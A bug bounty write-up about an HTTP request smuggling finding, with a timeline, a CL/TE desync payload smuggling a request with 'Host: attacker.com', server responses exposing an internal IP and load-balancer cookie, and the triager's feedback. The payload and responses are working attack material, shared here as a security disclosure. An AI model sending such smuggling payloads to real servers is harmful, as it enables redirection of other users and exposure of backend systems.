HTTP Request Smuggling: From Needs More Info to Confirmed Impact!

Startx

I reported a HTTP request smuggling vulnerability on a target platform that exposed sensitive internal IPs and allowed for malicious redirection through Host header injection. Initially, the report was marked as needing more information, with the triager requesting real-world impact examples, like stored XSS or header exfiltration to demonstrate the exploit’s relevance. Through detailed follow-up and evidence, I demonstrated how this could lead to malicious redirection and internal IP exposure, leading to a confirmed, impactful report.

Timeline

Initial Report: Submitted with a PoC showing internal IP exposure and Host header injection leading to redirection.Response: Triager marked the report as Needs More Info, questioning its real-world impact.Follow-up: Clarified the exploit’s potential for redirecting users and exposing sensitive backend information.Resolution: After additional review, the vulnerability was triaged and confirmed for remediation.

Technical Details

While testing the target’s request handling, I found inconsistencies between Transfer-Encoding and Content-Length headers, indicating potential for HTTP request smuggling.

PoC Payload:

GET /path/singup/r?OopAmfaC=test HTTP/1.1
Host: targetsite.com
Connection: keep-alive
Transfer-Encoding: chunked
Content-Length: 0

GET /icons HTTP/1.0
Connection: Keep-Alive

POST /icons HTTP/1.0
Host: attacker.com
Content-Length: 0

This crafted payload aimed to exploit backend request parsing, inserting a second request that bypassed the frontend checks and manipulated the backend’s Host header. Response:

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Oct 2024 10:55:05 GMT
Content-Type: text/html
Content-Length: 162
Location: https://10.8.154.59/icons/
Connection: keep-alive
Set-Cookie: BIGipServer~Internal~pool-CORP_MYDASHAGH-EXT.TARGET.COM-443=999950346.47873.0000; path=/; Httponly; Secure

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Oct 2024 10:55:05 GMT
Content-Type: text/html
Content-Length: 162
Location: https://attacker.com/icons/
Connection: close

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

Initial Feedback from Triager

The triager requested more evidence of real-world impact, specifically questioning how this exploit could affect other users. Suggested scenarios included redirecting victims, obtaining stored XSS, or exfiltrating headers via crafted POST requests.

The triager commented:

“Unfortunately, the provided PoC doesn’t demonstrate real-world impact. To validate the desync/smuggling attack, please provide an attack vector against other users.”